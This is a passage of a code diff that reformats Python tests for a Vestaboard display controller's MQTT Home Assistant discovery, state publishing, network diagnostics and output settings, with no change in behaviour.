         """Topic should use the configured discovery prefix."""
         config = MQTTConfig(discovery_prefix="my_ha", instance_id="board_1")
         entity = EntityDefinition(
-            entity_type="sensor", object_id="current_page",
-            name="Current Page", icon="mdi:page-layout-body",
+            entity_type="sensor",
+            object_id="current_page",
+            name="Current Page",
+            icon="mdi:page-layout-body",
         )
         topic = build_discovery_topic(config, entity)
         assert topic.startswith("my_ha/")
@@ -249,8 +250,11 @@ class TestDiscoveryTopics:
         """Topic should include the instance ID as node_id."""
         config = MQTTConfig(instance_id="office_board")
         entity = EntityDefinition(
-            entity_type="button", object_id="refresh_display",
-            name="Refresh", icon="mdi:refresh", has_command=True,
+            entity_type="button",
+            object_id="refresh_display",
+            name="Refresh",
+            icon="mdi:refresh",
+            has_command=True,
         )
         topic = build_discovery_topic(config, entity)
         assert "office_board" in topic
@@ -262,8 +266,10 @@ class TestDiscoveryPayloads:
     def test_payload_required_fields(self, mqtt_config, device_info):
         """Every payload must have name, unique_id, state_topic, availability, and device."""
         entity = EntityDefinition(
-            entity_type="sensor", object_id="current_page",
-            name="Current Page", icon="mdi:page-layout-body",
+            entity_type="sensor",
+            object_id="current_page",
+            name="Current Page",
+            icon="mdi:page-layout-body",
         )
         payload = build_discovery_payload(mqtt_config, entity, device_info)
         assert "name" in payload
@@ -275,8 +281,11 @@ class TestDiscoveryPayloads:
     def test_payload_unique_id_format(self, mqtt_config, device_info):
         """Unique ID must be {instance_id}_{object_id}."""
         entity = EntityDefinition(
-            entity_type="switch", object_id="schedule_enabled",
-            name="Schedule", icon="mdi:calendar-clock", has_command=True,
+            entity_type="switch",
+            object_id="schedule_enabled",
+            name="Schedule",
+            icon="mdi:calendar-clock",
+            has_command=True,
         )
         payload = build_discovery_payload(mqtt_config, entity, device_info)
         assert payload["unique_id"] == "fiestaboard_1_schedule_enabled"
@@ -284,8 +293,10 @@ class TestDiscoveryPayloads:
     def test_payload_state_topic(self, mqtt_config, device_info):
         """State topic must be {base_topic}/{object_id}/state."""
         entity = EntityDefinition(
-            entity_type="sensor", object_id="current_page",
-            name="Current Page", icon="mdi:page-layout-body",
+            entity_type="sensor",
+            object_id="current_page",
+            name="Current Page",
+            icon="mdi:page-layout-body",
         )
         payload = build_discovery_payload(mqtt_config, entity, device_info)
         assert payload["state_topic"] == "fiestaboard/current_page/state"
@@ -293,8 +304,11 @@ class TestDiscoveryPayloads:
     def test_payload_command_topic_present(self, mqtt_config, device_info):
         """Controllable entities must have a command_topic."""
         entity = EntityDefinition(
-            entity_type="switch", object_id="schedule_enabled",
-            name="Schedule", icon="mdi:calendar-clock", has_command=True,
+            entity_type="switch",
+            object_id="schedule_enabled",
+            name="Schedule",
+            icon="mdi:calendar-clock",
+            has_command=True,
         )
         payload = build_discovery_payload(mqtt_config, entity, device_info)
         assert "command_topic" in payload
@@ -303,8 +317,11 @@ class TestDiscoveryPayloads:
     def test_payload_command_topic_absent(self, mqtt_config, device_info):
         """Read-only entities must NOT have a command_topic."""
         entity = EntityDefinition(
-            entity_type="sensor", object_id="current_page",
-            name="Current Page", icon="mdi:page-layout-body", has_command=False,
+            entity_type="sensor",
+            object_id="current_page",
+            name="Current Page",
+            icon="mdi:page-layout-body",
+            has_command=False,
         )
         payload = build_discovery_payload(mqtt_config, entity, device_info)
         assert "command_topic" not in payload
@@ -312,8 +329,10 @@ class TestDiscoveryPayloads:
     def test_payload_availability(self, mqtt_config, device_info):
         """Availability must use LWT topic with online/offline payloads."""
         entity = EntityDefinition(
-            entity_type="sensor", object_id="service_status",
-            name="Status", icon="mdi:heart-pulse",
+            entity_type="sensor",
+            object_id="service_status",
+            name="Status",
+            icon="mdi:heart-pulse",
         )
         payload = build_discovery_payload(mqtt_config, entity, device_info)
         assert payload["availability_topic"] == "fiestaboard/status"
@@ -323,8 +342,11 @@ class TestDiscoveryPayloads:
     def test_switch_payload_has_on_off(self, mqtt_config, device_info):
         """Switch payloads must include payload_on and payload_off."""
         entity = EntityDefinition(
-            entity_type="switch", object_id="schedule_enabled",
-            name="Schedule", icon="mdi:calendar-clock", has_command=True,
+            entity_type="switch",
+            object_id="schedule_enabled",
+            name="Schedule",
+            icon="mdi:calendar-clock",
+            has_command=True,
         )
         payload = build_discovery_payload(mqtt_config, entity, device_info)
         assert payload["payload_on"] == "ON"
@@ -333,9 +355,12 @@ class TestDiscoveryPayloads:
     def test_select_payload_has_options(self, mqtt_config, device_info):
         """Select payloads must include options list."""
         entity = EntityDefinition(
-            entity_type="select", object_id="transition_style",
-            name="Transition Style", icon="mdi:transition",
-            has_command=True, options=["column", "reverse-column", "edges-to-center", "row", "diagonal", "random"],
+            entity_type="select",
+            object_id="transition_style",
+            name="Transition Style",
+            icon="mdi:transition",
+            has_command=True,
+            options=["column", "reverse-column", "edges-to-center", "row", "diagonal", "random"],
         )
         payload = build_discovery_payload(mqtt_config, entity, device_info)
         assert payload["options"] == ["column", "reverse-column", "edges-to-center", "row", "diagonal", "random"]
@@ -343,9 +368,13 @@ class TestDiscoveryPayloads:
     def test_text_payload_has_length_limits(self, mqtt_config, device_info):
         """Text payloads must include min/max length."""
         entity = EntityDefinition(
-            entity_type="text", object_id="send_message",
-            name="Send Message", icon="mdi:message-draw",
-            has_command=True, min_length=1, max_length=132,
+            entity_type="text",
+            object_id="send_message",
+            name="Send Message",
+            icon="mdi:message-draw",
+            has_command=True,
+            min_length=1,
+            max_length=132,
         )
         payload = build_discovery_payload(mqtt_config, entity, device_info)
         assert payload["min"] == 1
@@ -354,9 +383,15 @@ class TestDiscoveryPayloads:
     def test_number_payload_has_range(self, mqtt_config, device_info):
         """Number payloads must include min, max, step, and unit."""
         entity = EntityDefinition(
-            entity_type="number", object_id="refresh_interval",
-            name="Refresh Interval", icon="mdi:timer-outline",
-            has_command=True, min_value=30, max_value=3600, step=30, unit="s",
+            entity_type="number",
+            object_id="refresh_interval",
+            name="Refresh Interval",
+            icon="mdi:timer-outline",
+            has_command=True,
+            min_value=30,
+            max_value=3600,
+            step=30,
+            unit="s",
         )
         payload = build_discovery_payload(mqtt_config, entity, device_info)
         assert payload["min"] == 30
@@ -367,8 +402,11 @@ class TestDiscoveryPayloads:
     def test_binary_sensor_device_class(self, mqtt_config, device_info):
         """Binary sensor with device_class should include it in payload."""
         entity = EntityDefinition(
-            entity_type="binary_sensor", object_id="service_status",
-            name="Status", icon="mdi:heart-pulse", device_class="running",
+            entity_type="binary_sensor",
+            object_id="service_status",
+            name="Status",
+            icon="mdi:heart-pulse",
+            device_class="running",
         )
         payload = build_discovery_payload(mqtt_config, entity, device_info)
         assert payload["device_class"] == "running"
@@ -376,8 +414,10 @@ class TestDiscoveryPayloads:
     def test_invalid_entity_type_raises(self, mqtt_config, device_info):
         """Invalid entity type should raise ValueError."""
         entity = EntityDefinition(
-            entity_type="invalid_type", object_id="test",
-            name="Test", icon="mdi:test",
+            entity_type="invalid_type",
+            object_id="test",
+            name="Test",
+            icon="mdi:test",
         )
         with pytest.raises(ValueError, match="Invalid entity type"):
             build_discovery_payload(mqtt_config, entity, device_info)
@@ -385,8 +425,10 @@ class TestDiscoveryPayloads:
     def test_payload_device_info_linked(self, mqtt_config, device_info):
         """Payload must include the device info block."""
         entity = EntityDefinition(
-            entity_type="sensor", object_id="current_page",
-            name="Current Page", icon="mdi:page-layout-body",
+            entity_type="sensor",
+            object_id="current_page",
+            name="Current Page",
+            icon="mdi:page-layout-body",
         )
         payload = build_discovery_payload(mqtt_config, entity, device_info)
         assert payload["device"] == device_info
@@ -460,9 +502,7 @@ class TestBuildAllDiscoveryMessages:
 
     def test_configuration_url_included(self, mqtt_config):
         """Configuration URL should appear in device info when provided."""
-        messages = build_all_discovery_messages(
-            mqtt_config, configuration_url="http://192.168.1.50:4420"
-        )
+        messages = build_all_discovery_messages(mqtt_config, configuration_url="http://192.168.1.50:4420")
         payload = json.loads(messages[0]["payload"])
         assert payload["device"]["configuration_url"] == "http://192.168.1.50:4420"
 
@@ -501,8 +541,15 @@ class TestEntityCategorySupport:
 
     def test_diagnostic_entities_tagged(self, mqtt_config, device_info):
         """Diagnostic entities must have entity_category='diagnostic' in payload."""
-        diagnostic_ids = {"service_status", "version", "uptime", "board_api_mode",
-                          "active_plugins", "last_display_update", "output_target"}
+        diagnostic_ids = {
+            "service_status",
+            "version",
+            "uptime",
+            "board_api_mode",
+            "active_plugins",
+            "last_display_update",
+            "output_target",
+        }
         for entity in ENTITY_DEFINITIONS:
             if entity.object_id in diagnostic_ids:
                 payload = build_discovery_payload(mqtt_config, entity, device_info)
@@ -522,16 +569,25 @@ class TestEntityCategorySupport:
 
     def test_non_categorized_entities_no_category(self, mqtt_config, device_info):
         """Entities without a category must NOT include entity_category."""
-        uncategorized = {"schedule_enabled", "display_service", "active_page", "transition_style",
-                         "current_page", "current_message", "silence_mode", "page_count",
-                         "refresh_display", "blank_board", "send_message",
-                         "next_page", "previous_page"}
+        uncategorized = {
+            "schedule_enabled",
+            "display_service",
+            "active_page",
+            "transition_style",
+            "current_page",
+            "current_message",
+            "silence_mode",
+            "page_count",
+            "refresh_display",
+            "blank_board",
+            "send_message",
+            "next_page",
+            "previous_page",
+        }
         for entity in ENTITY_DEFINITIONS:
             if entity.object_id in uncategorized:
                 payload = build_discovery_payload(mqtt_config, entity, device_info)
-                assert "entity_category" not in payload, (
-                    f"Entity '{entity.object_id}' should not have entity_category"
-                )
+                assert "entity_category" not in payload, f"Entity '{entity.object_id}' should not have entity_category"
 
 
 class TestSensorClassSupport:
@@ -539,7 +595,7 @@ class TestSensorClassSupport:
 
     def test_uptime_sensor_has_duration_class(self, mqtt_config, device_info):
         """Uptime sensor should have device_class='duration' and unit='s'."""
-        entity = [e for e in ENTITY_DEFINITIONS if e.object_id == "uptime"][0]
+        entity = next(e for e in ENTITY_DEFINITIONS if e.object_id == "uptime")
         payload = build_discovery_payload(mqtt_config, entity, device_info)
         assert payload["device_class"] == "duration"
         assert payload["state_class"] == "total_increasing"
@@ -547,19 +603,19 @@ class TestSensorClassSupport:
 
     def test_page_count_state_class(self, mqtt_config, device_info):
         """Page count sensor should have state_class='measurement'."""
-        entity = [e for e in ENTITY_DEFINITIONS if e.object_id == "page_count"][0]
+        entity = next(e for e in ENTITY_DEFINITIONS if e.object_id == "page_count")
         payload = build_discovery_payload(mqtt_config, entity, device_info)
         assert payload["state_class"] == "measurement"
 
     def test_active_plugins_state_class(self, mqtt_config, device_info):
         """Active plugins sensor should have state_class='measurement'."""
-        entity = [e for e in ENTITY_DEFINITIONS if e.object_id == "active_plugins"][0]
+        entity = next(e for e in ENTITY_DEFINITIONS if e.object_id == "active_plugins")
         payload = build_discovery_payload(mqtt_config, entity, device_info)
         assert payload["state_class"] == "measurement"
 
     def test_version_no_state_class(self, mqtt_config, device_info):
         """Version sensor should NOT have state_class (it's text)."""
-        entity = [e for e in ENTITY_DEFINITIONS if e.object_id == "version"][0]
+        entity = next(e for e in ENTITY_DEFINITIONS if e.object_id == "version")
         payload = build_discovery_payload(mqtt_config, entity, device_info)
         assert "state_class" not in payload
 
@@ -569,7 +625,7 @@ class TestJsonAttributesSupport:
 
     def test_current_page_has_attributes_topic(self, mqtt_config, device_info):
         """Current page sensor should include json_attributes_topic."""
-        entity = [e for e in ENTITY_DEFINITIONS if e.object_id == "current_page"][0]
+        entity = next(e for e in ENTITY_DEFINITIONS if e.object_id == "current_page")
         payload = build_discovery_payload(mqtt_config, entity, device_info)
         assert "json_attributes_topic" in payload
         assert payload["json_attributes_topic"] == "fiestaboard/current_page/attributes"
@@ -603,19 +659,19 @@ class TestEventEntitySupport:
 
     def test_display_updated_event_types(self, mqtt_config, device_info):
         """display_updated event should declare its event types."""
-        entity = [e for e in ENTITY_DEFINITIONS if e.object_id == "display_updated"][0]
+        entity = next(e for e in ENTITY_DEFINITIONS if e.object_id == "display_updated")
         payload = build_discovery_payload(mqtt_config, entity, device_info)
         assert payload["event_types"] == ["message_sent", "page_refreshed", "board_blanked", "page_navigated"]
 
     def test_page_changed_event_types(self, mqtt_config, device_info):
         """page_changed event should declare its event types."""
-        entity = [e for e in ENTITY_DEFINITIONS if e.object_id == "page_changed"][0]
+        entity = next(e for e in ENTITY_DEFINITIONS if e.object_id == "page_changed")
         payload = build_discovery_payload(mqtt_config, entity, device_info)
         assert payload["event_types"] == ["page_switched"]
 
     def test_event_payload_has_state_topic(self, mqtt_config, device_info):
         """Event entities must have a state_topic for receiving event data."""
-        entity = [e for e in ENTITY_DEFINITIONS if e.object_id == "display_updated"][0]
+        entity = next(e for e in ENTITY_DEFINITIONS if e.object_id == "display_updated")
         payload = build_discovery_payload(mqtt_config, entity, device_info)
         assert payload["state_topic"] == "fiestaboard/display_updated/state"
 
@@ -632,7 +688,7 @@ class TestDiagnosticSensors:
 
     def test_uptime_sensor(self):
         """Uptime sensor should be a diagnostic sensor with duration class."""
-        entity = [e for e in ENTITY_DEFINITIONS if e.object_id == "uptime"][0]
+        entity = next(e for e in ENTITY_DEFINITIONS if e.object_id == "uptime")
         assert entity.entity_type == "sensor"
         assert entity.entity_category == "diagnostic"
         assert entity.device_class == "duration"
@@ -642,14 +698,14 @@ class TestDiagnosticSensors:
 
     def test_board_api_mode_sensor(self):
         """Board API mode sensor should be a diagnostic sensor."""
-        entity = [e for e in ENTITY_DEFINITIONS if e.object_id == "board_api_mode"][0]
+        entity = next(e for e in ENTITY_DEFINITIONS if e.object_id == "board_api_mode")
         assert entity.entity_type == "sensor"
         assert entity.entity_category == "diagnostic"
         assert entity.has_command is False
 
     def test_active_plugins_sensor(self):
         """Active plugins sensor should be a diagnostic sensor with measurement class."""
-        entity = [e for e in ENTITY_DEFINITIONS if e.object_id == "active_plugins"][0]
+        entity = next(e for e in ENTITY_DEFINITIONS if e.object_id == "active_plugins")
         assert entity.entity_type == "sensor"
         assert entity.entity_category == "diagnostic"
         assert entity.state_class == "measurement"
@@ -657,7 +713,7 @@ class TestDiagnosticSensors:
 
     def test_last_display_update_sensor(self):
         """Last display update sensor should be a diagnostic sensor with timestamp class."""
-        entity = [e for e in ENTITY_DEFINITIONS if e.object_id == "last_display_update"][0]
+        entity = next(e for e in ENTITY_DEFINITIONS if e.object_id == "last_display_update")
         assert entity.entity_type == "sensor"
         assert entity.entity_category == "diagnostic"
         assert entity.device_class == "timestamp"
@@ -665,7 +721,7 @@ class TestDiagnosticSensors:
 
     def test_output_target_sensor(self):
         """Output target sensor should be a diagnostic sensor."""
-        entity = [e for e in ENTITY_DEFINITIONS if e.object_id == "output_target"][0]
+        entity = next(e for e in ENTITY_DEFINITIONS if e.object_id == "output_target")
         assert entity.entity_type == "sensor"
         assert entity.entity_category == "diagnostic"
         assert entity.has_command is False
@@ -676,14 +732,14 @@ class TestNavigationButtons:
 
     def test_next_page_button(self):
         """Next page button should be controllable."""
-        entity = [e for e in ENTITY_DEFINITIONS if e.object_id == "next_page"][0]
+        entity = next(e for e in ENTITY_DEFINITIONS if e.object_id == "next_page")
         assert entity.entity_type == "button"
         assert entity.has_command is True
         assert entity.icon == "mdi:page-next"
 
     def test_previous_page_button(self):
         """Previous page button should be controllable."""
-        entity = [e for e in ENTITY_DEFINITIONS if e.object_id == "previous_page"][0]
+        entity = next(e for e in ENTITY_DEFINITIONS if e.object_id == "previous_page")
         assert entity.entity_type == "button"
         assert entity.has_command is True
         assert entity.icon == "mdi:page-previous"
@@ -694,12 +750,12 @@ class TestSettingsChangedEvent:
 
     def test_settings_changed_event_exists(self):
         """settings_changed event should exist."""
-        entity = [e for e in ENTITY_DEFINITIONS if e.object_id == "settings_changed"][0]
+        entity = next(e for e in ENTITY_DEFINITIONS if e.object_id == "settings_changed")
         assert entity.entity_type == "event"
 
     def test_settings_changed_event_types(self, mqtt_config, device_info):
         """settings_changed event should declare schedule, service, and silence event types."""
-        entity = [e for e in ENTITY_DEFINITIONS if e.object_id == "settings_changed"][0]
+        entity = next(e for e in ENTITY_DEFINITIONS if e.object_id == "settings_changed")
         payload = build_discovery_payload(mqtt_config, entity, device_info)
         assert "schedule_toggled" in payload["event_types"]
         assert "service_toggled" in payload["event_types"]
@@ -707,7 +763,7 @@ class TestSettingsChangedEvent:
 
     def test_settings_changed_no_command_topic(self, mqtt_config, device_info):
         """settings_changed event should not have command_topic."""
-        entity = [e for e in ENTITY_DEFINITIONS if e.object_id == "settings_changed"][0]
+        entity = next(e for e in ENTITY_DEFINITIONS if e.object_id == "settings_changed")
         payload = build_discovery_payload(mqtt_config, entity, device_info)
         assert "command_topic" not in payload
 
@@ -718,11 +774,12 @@ class TestTransitionStrategySourceOfTruth:
     def test_transition_options_match_board_client(self):
         """Transition style options must match VALID_STRATEGIES from board_client."""
         from src.board_client import VALID_STRATEGIES
-        entity = [e for e in ENTITY_DEFINITIONS if e.object_id == "transition_style"][0]
+
+        entity = next(e for e in ENTITY_DEFINITIONS if e.object_id == "transition_style")
         assert entity.options == list(VALID_STRATEGIES)
 
     def test_last_display_update_has_timestamp_class(self, mqtt_config, device_info):
         """last_display_update sensor should have device_class='timestamp'."""
-        entity = [e for e in ENTITY_DEFINITIONS if e.object_id == "last_display_update"][0]
+        entity = next(e for e in ENTITY_DEFINITIONS if e.object_id == "last_display_update")
         payload = build_discovery_payload(mqtt_config, entity, device_info)
         assert payload["device_class"] == "timestamp"

--- a/tests/test_mqtt_state.py
+++ b/tests/test_mqtt_state.py
@@ -1,11 +1,12 @@
 """Tests for MQTT state publisher."""
 
 import json
-import pytest
 from unittest.mock import MagicMock, patch
 
-from src.mqtt.config import MQTTConfig
+import pytest
+
 from src.mqtt.client import MQTTClient
+from src.mqtt.config import MQTTConfig
 from src.mqtt.state import StatePublisher
 
 
@@ -122,9 +123,7 @@ class TestStatePublisherDiagnostics:
     @patch("src.pages.service.get_page_service")
     @patch("src.settings.service.get_settings_service")
     @patch("src.config.Config")
-    def test_gather_publishes_uptime(
-        self, mock_config, get_settings, get_page, mock_board, mock_cm, mock_client
-    ):
+    def test_gather_publishes_uptime(self, mock_config, get_settings, get_page, mock_board, mock_cm, mock_client):
         mock_config.is_silence_mode_active.return_value = False
         settings = MagicMock()
         settings.is_schedule_enabled.return_value = False
@@ -331,9 +330,7 @@ class TestStatePublisherAttributes:
     @patch("src.pages.service.get_page_service")
     @patch("src.settings.service.get_settings_service")
     @patch("src.config.Config")
-    def test_gather_publishes_current_page_attributes(
-        self, mock_config, get_settings, get_page, mock_client
-    ):
+    def test_gather_publishes_current_page_attributes(self, mock_config, get_settings, get_page, mock_client):
         mock_config.is_silence_mode_active.return_value = False
         settings = MagicMock()
         settings.is_schedule_enabled.return_value = False

--- a/tests/test_network_diagnostics.py
+++ b/tests/test_network_diagnostics.py
@@ -16,7 +16,6 @@ from src.network_diagnostics import (
     run_full_diagnostics,
 )
 
-
 _URL_RE = re.compile(r"https?://[^\s'\"<>]+")
 
 
@@ -33,9 +32,11 @@ def _mentions_host(text, expected_host):
             return True
     return False
 
+
 # ---------------------------------------------------------------------------
 # check_dns_resolution
 # ---------------------------------------------------------------------------
+
 
 class TestCheckDnsResolution:
     """Tests for check_dns_resolution."""
@@ -83,6 +84,7 @@ class TestCheckDnsResolution:
 # ---------------------------------------------------------------------------
 # check_internet_connectivity
 # ---------------------------------------------------------------------------
+
 
 class TestCheckInternetConnectivity:
     """Tests for check_internet_connectivity."""
@@ -159,6 +161,7 @@ class TestCheckInternetConnectivity:
 # check_port_reachable
 # ---------------------------------------------------------------------------
 
+
 class TestCheckPortReachable:
     """Tests for check_port_reachable."""
 
@@ -197,6 +200,7 @@ class TestCheckPortReachable:
 # ---------------------------------------------------------------------------
 # check_vestaboard_connection
 # ---------------------------------------------------------------------------
+
 
 class TestCheckVestaboardConnection:
     """Tests for check_vestaboard_connection."""
@@ -262,9 +266,7 @@ class TestCheckVestaboardConnection:
         mock_resp.status_code = 200
         mock_get.return_value = mock_resp
 
-        result = check_vestaboard_connection(
-            host="", use_cloud=True, cloud_key="rw-key-123"
-        )
+        result = check_vestaboard_connection(host="", use_cloud=True, cloud_key="rw-key-123")
 
         assert result["ok"] is True
         assert result["mode"] == "cloud"
@@ -274,9 +276,7 @@ class TestCheckVestaboardConnection:
     def test_cloud_failure(self, mock_get):
         mock_get.side_effect = requests.exceptions.ConnectionError("no route")
 
-        result = check_vestaboard_connection(
-            host="", use_cloud=True, cloud_key="rw-key-123"
-        )
+        result = check_vestaboard_connection(host="", use_cloud=True, cloud_key="rw-key-123")
 
         assert result["ok"] is False
         assert result["mode"] == "cloud"
@@ -287,9 +287,7 @@ class TestCheckVestaboardConnection:
         mock_resp.status_code = 500
         mock_get.return_value = mock_resp
 
-        result = check_vestaboard_connection(
-            host="", use_cloud=True, cloud_key="rw-key-123"
-        )
+        result = check_vestaboard_connection(host="", use_cloud=True, cloud_key="rw-key-123")
 
         assert result["ok"] is False
 
@@ -297,6 +295,7 @@ class TestCheckVestaboardConnection:
 # ---------------------------------------------------------------------------
 # _build_recommendations
 # ---------------------------------------------------------------------------
+
 
 class TestBuildRecommendations:
     """Tests for _build_recommendations troubleshooting output."""
@@ -321,10 +320,7 @@ class TestBuildRecommendations:
         recs = _build_recommendations(results)
         assert any("cannot look up" in r["summary"].lower() for r in recs)
         # Should suggest common DNS servers
-        assert any(
-            any("8.8.8.8" in s or "1.1.1.1" in s for s in r["steps"])
-            for r in recs
-        )
+        assert any(any("8.8.8.8" in s or "1.1.1.1" in s for s in r["steps"]) for r in recs)
 
     def test_internet_failure_with_dns_ok_recommends_router(self):
         results = {
@@ -334,10 +330,7 @@ class TestBuildRecommendations:
         }
         recs = _build_recommendations(results)
         assert any("cannot reach the internet" in r["summary"].lower() for r in recs)
-        assert any(
-            any("router" in s.lower() for s in r["steps"])
-            for r in recs
-        )
+        assert any(any("router" in s.lower() for s in r["steps"]) for r in recs)
 
     def test_internet_failure_with_dns_down_points_to_dns(self):
         results = {
@@ -347,10 +340,7 @@ class TestBuildRecommendations:
         }
         recs = _build_recommendations(results)
         # Should tell user to fix DNS first
-        assert any(
-            any("dns" in s.lower() and "fix" in s.lower() for s in r["steps"])
-            for r in recs
-        )
+        assert any(any("dns" in s.lower() and "fix" in s.lower() for s in r["steps"]) for r in recs)
 
     def test_no_board_configured_no_extra_recommendation(self):
         results = {
@@ -367,24 +357,23 @@ class TestBuildRecommendations:
             "dns": {"ok": True},
             "internet": {"ok": True},
             "vestaboard": {
-                "ok": False, "mode": "local",
+                "ok": False,
+                "mode": "local",
                 "steps": {"dns": {"ok": False, "hostname": "myboard.local"}},
             },
         }
         recs = _build_recommendations(results)
         assert any("myboard.local" in r["summary"] for r in recs)
         # Should suggest using IP address
-        assert any(
-            any("ip" in s.lower() for s in r["steps"])
-            for r in recs
-        )
+        assert any(any("ip" in s.lower() for s in r["steps"]) for r in recs)
 
     def test_local_port_failure_recommends_local_api(self):
         results = {
             "dns": {"ok": True},
             "internet": {"ok": True},
             "vestaboard": {
-                "ok": False, "mode": "local",
+                "ok": False,
+                "mode": "local",
                 "steps": {
                     "dns": {"ok": True},
                     "port": {"ok": False, "port": 7000, "error": "refused"},
@@ -393,17 +382,15 @@ class TestBuildRecommendations:
         }
         recs = _build_recommendations(results)
         assert any("cannot connect" in r["summary"].lower() for r in recs)
-        assert any(
-            any("local api" in s.lower() for s in r["steps"])
-            for r in recs
-        )
+        assert any(any("local api" in s.lower() for s in r["steps"]) for r in recs)
 
     def test_local_api_auth_failure_recommends_key_check(self):
         results = {
             "dns": {"ok": True},
             "internet": {"ok": True},
             "vestaboard": {
-                "ok": False, "mode": "local",
+                "ok": False,
+                "mode": "local",
                 "steps": {
                     "dns": {"ok": True},
                     "port": {"ok": True},
@@ -415,11 +402,7 @@ class TestBuildRecommendations:
         assert any("api key" in r["summary"].lower() for r in recs)
         # Docs copy points users to enablement token flow (not app Settings)
         assert any(
-            any(
-                "enablement token" in s.lower()
-                or "vestaboard.com/local-api" in s.lower()
-                for s in r["steps"]
-            )
+            any("enablement token" in s.lower() or "vestaboard.com/local-api" in s.lower() for s in r["steps"])
             for r in recs
         )
 
@@ -428,7 +411,8 @@ class TestBuildRecommendations:
             "dns": {"ok": True},
             "internet": {"ok": True},
             "vestaboard": {
-                "ok": False, "mode": "local",
+                "ok": False,
+                "mode": "local",
                 "steps": {
                     "dns": {"ok": True},
                     "port": {"ok": True},
@@ -437,17 +421,15 @@ class TestBuildRecommendations:
             },
         }
         recs = _build_recommendations(results)
-        assert any(
-            any("unplug" in s.lower() for s in r["steps"])
-            for r in recs
-        )
+        assert any(any("unplug" in s.lower() for s in r["steps"]) for r in recs)
 
     def test_local_api_no_response_recommends_retry(self):
         results = {
             "dns": {"ok": True},
             "internet": {"ok": True},
             "vestaboard": {
-                "ok": False, "mode": "local",
+                "ok": False,
+                "mode": "local",
                 "steps": {
                     "dns": {"ok": True},
                     "port": {"ok": True},
@@ -456,58 +438,49 @@ class TestBuildRecommendations:
             },
         }
         recs = _build_recommendations(results)
-        assert any(
-            any("starting up" in s.lower() or "try again" in s.lower() for s in r["steps"])
-            for r in recs
-        )
+        assert any(any("starting up" in s.lower() or "try again" in s.lower() for s in r["steps"]) for r in recs)
 
     def test_cloud_auth_failure_recommends_key_check(self):
         results = {
             "dns": {"ok": True},
             "internet": {"ok": True},
             "vestaboard": {
-                "ok": False, "mode": "cloud",
+                "ok": False,
+                "mode": "cloud",
                 "steps": {"cloud_api": {"ok": False, "status_code": 403}},
             },
         }
         recs = _build_recommendations(results)
         assert any("rejected" in r["summary"].lower() for r in recs)
-        assert any(
-            any(_mentions_host(s, "web.vestaboard.com") for s in r["steps"])
-            for r in recs
-        )
+        assert any(any(_mentions_host(s, "web.vestaboard.com") for s in r["steps"]) for r in recs)
 
     def test_cloud_server_error_recommends_wait(self):
         results = {
             "dns": {"ok": True},
             "internet": {"ok": True},
             "vestaboard": {
-                "ok": False, "mode": "cloud",
+                "ok": False,
+                "mode": "cloud",
                 "steps": {"cloud_api": {"ok": False, "status_code": 500}},
             },
         }
         recs = _build_recommendations(results)
         assert any("temporarily down" in r["summary"].lower() for r in recs)
-        assert any(
-            any("wait" in s.lower() for s in r["steps"])
-            for r in recs
-        )
+        assert any(any("wait" in s.lower() for s in r["steps"]) for r in recs)
 
     def test_cloud_connection_error_recommends_internet(self):
         results = {
             "dns": {"ok": True},
             "internet": {"ok": True},
             "vestaboard": {
-                "ok": False, "mode": "cloud",
+                "ok": False,
+                "mode": "cloud",
                 "steps": {"cloud_api": {"ok": False, "status_code": None, "error": "no route"}},
             },
         }
         recs = _build_recommendations(results)
         assert any("cannot reach" in r["summary"].lower() for r in recs)
-        assert any(
-            any(_mentions_host(s, "rw.vestaboard.com") for s in r["steps"])
-            for r in recs
-        )
+        assert any(any(_mentions_host(s, "rw.vestaboard.com") for s in r["steps"]) for r in recs)
 
     def test_cloud_fallback_recommends_check(self):
         """Cloud mode with no specific error triggers the fallback recommendation."""
@@ -515,7 +488,8 @@ class TestBuildRecommendations:
             "dns": {"ok": True},
             "internet": {"ok": True},
             "vestaboard": {
-                "ok": False, "mode": "cloud",
+                "ok": False,
+                "mode": "cloud",
                 "steps": {"cloud_api": {"ok": False, "status_code": None}},
             },
         }
@@ -529,7 +503,8 @@ class TestBuildRecommendations:
             "dns": {"ok": False},
             "internet": {"ok": False},
             "vestaboard": {
-                "ok": False, "mode": "local",
+                "ok": False,
+                "mode": "local",
                 "steps": {"dns": {"ok": False, "hostname": "board.local"}},
             },
         }
@@ -544,6 +519,7 @@ class TestBuildRecommendations:
 # ---------------------------------------------------------------------------
 # run_full_diagnostics
 # ---------------------------------------------------------------------------
+
 
 class TestRunFullDiagnostics:
     """Tests for run_full_diagnostics."""

--- a/tests/test_output.py
+++ b/tests/test_output.py
@@ -1,41 +1,38 @@
 """Tests for output target routing and settings service."""
 
-import pytest
-from unittest.mock import Mock, patch
-import tempfile
 import os
+import tempfile
+from unittest.mock import Mock, patch
+
+import pytest
 
 from src.settings.service import (
+    VALID_OUTPUT_TARGETS,
+    VALID_STRATEGIES,
+    OutputSettings,
     SettingsService,
     TransitionSettings,
-    OutputSettings,
-    VALID_STRATEGIES,
-    VALID_OUTPUT_TARGETS,
 )
 
 
 class TestTransitionSettings:
     """Tests for TransitionSettings dataclass."""
-    
+
     def test_default_values(self):
         """Test default values are None."""
         settings = TransitionSettings()
         assert settings.strategy is None
         assert settings.step_interval_ms is None
         assert settings.step_size is None
-    
+
     def test_to_dict(self):
         """Test conversion to dictionary."""
-        settings = TransitionSettings(
-            strategy="column",
-            step_interval_ms=500,
-            step_size=2
-        )
+        settings = TransitionSettings(strategy="column", step_interval_ms=500, step_size=2)
         d = settings.to_dict()
         assert d["strategy"] == "column"
         assert d["step_interval_ms"] == 500
         assert d["step_size"] == 2
-    
+
     def test_from_dict(self):
         """Test creation from dictionary."""
         d = {"strategy": "row", "step_interval_ms": 1000, "step_size": 3}
@@ -47,17 +44,17 @@ class TestTransitionSettings:
 
 class TestOutputSettings:
     """Tests for OutputSettings dataclass."""
-    
+
     def test_default_target(self):
         """Test default target is 'board'."""
         settings = OutputSettings()
         assert settings.target == "board"
-    
+
     def test_from_dict_valid_target(self):
         """Test creation from dict with valid target."""
         settings = OutputSettings.from_dict({"target": "both"})
         assert settings.target == "both"
-    
+
     def test_from_dict_invalid_target_falls_back(self):
         """Test invalid target falls back to 'board'."""
         settings = OutputSettings.from_dict({"target": "invalid"})
@@ -66,79 +63,76 @@ class TestOutputSettings:
 
 class TestSettingsService:
     """Tests for SettingsService."""
-    
+
     @pytest.fixture
     def temp_settings_file(self):
         """Create a temporary settings file."""
-        with tempfile.NamedTemporaryFile(mode='w', suffix='.json', delete=False) as f:
-            f.write('{}')
+        with tempfile.NamedTemporaryFile(mode="w", suffix=".json", delete=False) as f:
